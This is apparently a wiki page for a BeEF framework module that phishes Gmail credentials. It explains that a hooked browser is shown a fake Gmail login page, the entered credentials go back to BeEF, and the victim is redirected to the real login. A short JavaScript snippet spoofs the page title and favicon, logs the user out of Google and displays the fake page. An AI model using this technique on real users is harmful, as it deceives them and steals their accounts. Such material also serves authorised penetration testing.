Skip to content

Module: Google Phishing

Haoxi Tan edited this page Jan 9, 2020 · 2 revisions

Summary

  • Objective: Phish gmail credentials

  • Authors: floyd

  • Browsers: Chrome

  • Code

Internal Working

User is presented with a login page for gmail. When the user enters credentials they are sent back to beef, and they are redirected to the real gmail login page (where they are prompted for their login again)

beef.execute(function() {
        document.title = "Google Mail: Email from Google";
        beef.browser.changeFavicon("https://www.google.com/mail/help/images/favicon.ico");
        logoutGoogle();
    displayPhishingSite();
});

Screenshots

Feedback

Clone this wiki locally